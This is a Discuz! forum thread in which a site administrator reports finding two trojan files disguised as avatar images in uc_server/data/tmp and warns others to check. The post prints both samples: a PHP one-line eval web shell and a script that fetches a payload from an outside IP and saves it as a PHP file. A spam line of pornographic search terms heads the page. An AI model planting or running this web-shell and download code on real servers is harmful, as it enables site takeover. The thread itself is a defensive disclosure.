男的舔女的下面视频在线播放-少妇愉情理仑片高潮日本-久久久久久国产一区二区三区-麻豆精品一区二区综合-国产精品超碰在线观看-网红极品女神精品视频在线-国产亚洲综合777-高清性视频一区二区播放-中文字幕第一页亚洲天堂
Discuz! 官方交流社區(qū)
標(biāo)題:
uc_server\data\tmp被上傳木馬文件 建議自查
[打印本頁]
作者:
onlygod
時(shí)間:
2019-11-14 16:53
標(biāo)題:
uc_server\data\tmp被上傳木馬文件 建議自查
(, 下載次數(shù): 55)
上傳
點(diǎn)擊文件名下載附件
今天網(wǎng)站搬家,順手用最新版的D盾掃描了一下,發(fā)現(xiàn)兩個(gè)可疑文件,圖片格式。
路徑為:uc_server\data\tmp
將格式圖片格式的后綴改為 .php,用記事本打開,發(fā)現(xiàn)一句話木馬,兩個(gè)文件分別如下:
<?php @eval($_POST['1']);?>
復(fù)制代碼
<script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt'); file_put_contents('a.php',$save) ;</script>
復(fù)制代碼
目前暫時(shí)沒掃出其他木馬,懷疑上傳木馬后并沒有成功執(zhí)行。
文件名分別為:
upload37372
upload29060
后面的數(shù)字應(yīng)該是用戶ID,建議將圖片改成隨機(jī)數(shù)字命名,否則容易被黑客利用。
IIS的解析漏洞,配合這個(gè),有可能能拿下webshell。
-------建議大家自查一下。 不知道新版有木有這個(gè)漏洞,知道的大神說下。
作者:
耗子
時(shí)間:
2019-11-14 17:43
這種情況一般都是頭像進(jìn)來的, 做好防護(hù)措施 尤其服務(wù)器 廣告IIS有這個(gè)漏洞 包括 這個(gè)是PHP的漏洞
歡迎光臨 Discuz! 官方交流社區(qū) (http://m.sdtechgong.com.cn/)
Powered by Discuz! X5.0